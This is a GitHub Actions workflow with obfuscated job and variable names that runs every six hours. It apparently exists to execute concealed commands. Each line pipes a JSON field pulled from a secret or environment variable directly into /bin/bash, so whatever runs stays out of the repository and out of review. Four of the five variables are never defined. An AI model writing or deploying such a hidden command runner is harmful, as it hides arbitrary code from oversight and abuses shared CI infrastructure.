name: juiceqinzq
on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juiceqinzq
        env:
          amoh63721: ${{ secrets.amoh63721 }}
        run: |
          echo $amoh63721 | jq -r .si2497 | /bin/bash
          echo $tfxl490 | jq -r .hudn20955 | /bin/bash
          echo $rfucd97 | jq -r .funkv90746 | /bin/bash
          echo $qar84 | jq -r .d55203 | /bin/bash
          echo $zah79336 | jq -r .o39232 | /bin/bash

